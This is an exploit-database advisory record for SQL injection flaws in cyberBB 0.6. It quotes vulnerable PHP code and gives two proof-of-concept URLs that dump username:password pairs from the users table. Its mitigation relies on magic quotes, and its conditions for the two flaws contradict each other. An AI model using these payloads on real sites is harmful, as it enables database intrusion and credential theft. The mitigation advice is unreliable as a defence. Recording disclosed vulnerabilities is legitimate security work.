cyberBB v. 0.6 Multiply Remote SQL Injection Vulnerabilities

vendor:

cyberBB

by:

cOndemned [ Dark-Coders ]

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: cyberBB

Affected Version From: 0.6

Affected Version To: 0.6

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

cyberBB v. 0.6 Multiply Remote SQL Injection Vulnerabilities

cyberBB v. 0.6 is vulnerable to multiple remote SQL injection vulnerabilities. The first vulnerability is located in the 'show_topic.php' file with the 'id' parameter. The second vulnerability is located in the 'profile.php' file with the 'user' parameter. Both vulnerabilities require the user to be logged in and the magic quotes gpc must be off. An attacker can exploit these vulnerabilities to gain access to the database and extract sensitive information such as usernames and passwords.

Mitigation:

Ensure that the magic quotes gpc is enabled and that user input is properly sanitized before being used in SQL queries.

Source

Exploit-DB raw data:

########################################################################################
#
#   Name        :   cyberBB v. 0.6 Multiply Remote SQL Injection Vulnerabilities
#   Author      :   cOndemned [ Dark-Coders ]
#   Greetz      :   Avantura, str0ke, ZaBeaTy, voo|doo, irk4z, and many, many more...
#   Conditions  :   Magic quotes gpc = On & Off / User must be logged into 
#
########################################################################################

source of /show_topic.php :

    21.     $id=$_REQUEST['id'];
    22.
    23.     if(isset($_REQUEST['p'])) $p=$_REQUEST['p']; else $p='';
    24.
    25.     $db = mysql_connect($mysql_server,$mysql_user,$mysql_pass);
    26.
    27.     mysql_select_db($mysql_db);
    28.
    29.     $sql = "SELECT * FROM `topics` WHERE `id` = $id";


 proof of concept :
    
    /show_topic.php?id=-1+UNION+SELECT+1,2,3,4,concat(username,0x3a,password),6,7+FROM+users/*


second sql injection (magic quotes gpc must be off):
    
    /profile.php?user='-1+UNION+SELECT+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11+FROM+users/*

   
just 4 fun

# milw0rm.com [2008-08-18]